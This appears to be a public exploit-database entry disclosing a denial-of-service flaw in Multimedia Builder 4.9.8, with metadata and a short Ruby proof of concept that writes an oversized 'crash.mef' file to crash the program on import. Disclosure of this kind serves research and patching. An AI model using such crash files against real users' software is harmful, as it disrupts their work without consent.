Multimedia Builder 4.9.8 Malicious mef File Denial of service

vendor:

Multimedia Builder

by:

Ahmed Elhady Mohamed

N/A

CVSS

N/A

Denial of Service

CWE

Product Name: Multimedia Builder

Affected Version From: 4.9.2008

Affected Version To: 4.9.2008

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

Unknown

Multimedia Builder 4.9.8 Malicious mef File Denial of service

Multimedia Builder 4.9.8 is vulnerable to a denial of service attack when opening a malicious .mef file. The exploit involves triggering the vulnerability by going to file->MEF Import ->load MEF.

Mitigation:

Source

Exploit-DB raw data:

Multimedia Builder 4.9.8 Malicious mef File Denial of service
===================================================================================
# Exploit Title:Multimedia Builder 4.9.8 Malicious mef File Denial of service
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# Website: www.infosec4all.tk
# version: 4.9.8
# Category: DOS
# Tested on: windows XP SP3
===================================================================================
########################################DESC####################################################
#Multimedia Builder 4.9.8 Malicious mef File Denial of service vulnerability ,when opening a   #
#malicious .mef file.                                                                          #
#To trigger the exploit , go to file->MEF Import ->load MEF                                    #                                                               #
################################################################################################
 
#!/usr/bin/ruby

File.open "crash.mef" , "w" do |file|

crash = "\x41" * 1000
file.write crash
end